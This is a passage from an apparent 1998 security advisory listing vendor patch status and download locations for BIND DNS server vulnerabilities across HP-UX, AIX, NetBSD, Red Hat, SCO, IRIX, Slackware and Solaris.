HP-UX release 9.0, 9.01, 9.03, 9.04, 9.05, & 9.07: PHNE_13187
HP-UX release 10.00, 10.01, 10.10 and 10.20: PHNE_14617
HP-UX release 10.24 : PHNE_16204
HP-UX release 11.00: PHNE_12957
IBM Corporation
---------------
The version of bind shipped with AIX is vulnerable and the
following APARs will be available soon:
AIX 4.1.x: IX76958 (fix for Topic 1 only)
AIX 4.2.x: IX76959 (fix for Topic 1 only)
AIX 4.3.x: IX76960 (fix for Topic 1 and 3 only)
AIX 4.3.x: IX76962 (fix for Topic 1, 2, and 3. This is bind 8.1.2.)
Until the official fixes are available, a temporary patch can be
found at:
ftp://aix.software.ibm.com/aix/efixes/security
NEC Corporation
---------------
Topic1 - Some systems are vulnerable. Patches will be available
soon, especially for UX/4800 R11.x and R13.x.
Topic2 - Some systems are vulnerable. Patches will be available
soon after the release of bind-4.9.7, especially for
UX/4800 R11.x and R13.x.
Topic3 - We do not ship BIND 8 with our products so we are not
vulnerable to this problem.
The NetBSD Project
------------------
The first problem can be fixed in NetBSD 1.3, 1.3.1, and -current
prior to 19980408 with the supplied BIND 4.9.6 patch. A patch
has been made available for NetBSD 1.3 and 1.3.1, and can be
found on the NetBSD FTP server:
ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19980506-bind
(alternatively, upgrading to BIND 4.9.7 or 8.1.2 when available
will also solve this problem.) NetBSD is not affected by the
third problem.
Red Hat Software, Inc.
----------------------
Red Hat fixes will be available at:
rpm -Uvh ftp://ftp.redhat.com/updates/5.0/i386/bind-4.9.6-7.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/5.0/alpha/bind-4.9.6-7.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/i386/bind-4.9.6-1.1.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/alpha/bind-4.9.6-1.1.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/sparc/bind-4.9.6-1.1.sparc.rpm
The Santa Cruz Operation, Inc.
------------------------------
The following SCO products are vulnerable:
- SCO Open Desktop/Open Server 3.0, SCO UNIX 3.2v4
- SCO OpenServer 5.0 (also SCO Internet FastStart)
- SCO UnixWare 2.1
- SCO UnixWare 7
SCO CMW+ 3.0 is not vulnerable as BIND/named is not supported on
CMW+ platforms. Binary versions of BIND 4.9.7 will be available
shortly from the SCO ftp site:
ftp://ftp.sco.com/SSE/sse012.ltr - cover letter
ftp://ftp.sco.com/SSE/sse012.tar.Z - replacement binaries
Silicon Graphics, Inc.
----------------------
The BIND named(1M) daemon is not installed by default on IRIX.
The BIND named(1M) program for IRIX 3.X through IRIX 6.4 has these
vulnerabilities. Patches are:
OS Version Patch #
---------- ---------
IRIX 3.x ugrade or use unsupported freeware
IRIX 4.x ugrade or use unsupported freeware
IRIX 5.0.x ugrade or use unsupported freeware
IRIX 5.1.x ugrade or use unsupported freeware
IRIX 5.2 ugrade or use unsupported freeware
IRIX 5.3 3268
IRIX 6.0.x ugrade or use unsupported freeware
IRIX 6.1 ugrade or use unsupported freeware
IRIX 6.2 3117
IRIX 6.3 2740
IRIX 6.4 2741
Slackware Linux
---------------
The Slackware Linux 3.4 BIND packages is fixed. Source code,
package skeletons, and SlackBuild scripts to build the Slackware
BIND packages can be found in these directories:
Source to build bind-4.9.7-T1B:
ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/contrib/bind-4/
Source to build bind-8.1.2-T3B:
ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/n/bind/
The precompiled binary packages can be found at these URLs:
Slackware binary package of bind-4.9.7-T1B:
ftp://ftp.cdrom.com/pub/linux/slackware-3.4/contrib/bind-4.tgz
Slackware binary package of bind-8.1.2-T3B:
ftp://ftp.cdrom.com/pub/linux/slackware-3.4/slakware/n1/bind.tgz
Sun Microsystems, Inc.
----------------------
Sun recommends that you install the respective patches immediately
on vulnerable systems including both DNS clients and servers:
Operating System Patch ID
---------------- ---------
Solaris 2.6 105755-07
Solaris 2.6_x86 105756-07
Solaris 2.5.1 103663-15
Solaris 2.5.1_x86 103664-15
Solaris 2.5 103667-11
Solaris 2.5_x86 103668-11
Solaris 2.4 102479-13
Solaris 2.4_x86 102480-11
Solaris 2.3 101359-10
SunOS 4.1.4 106866-02
SunOS 4.1.3_U1 106865-02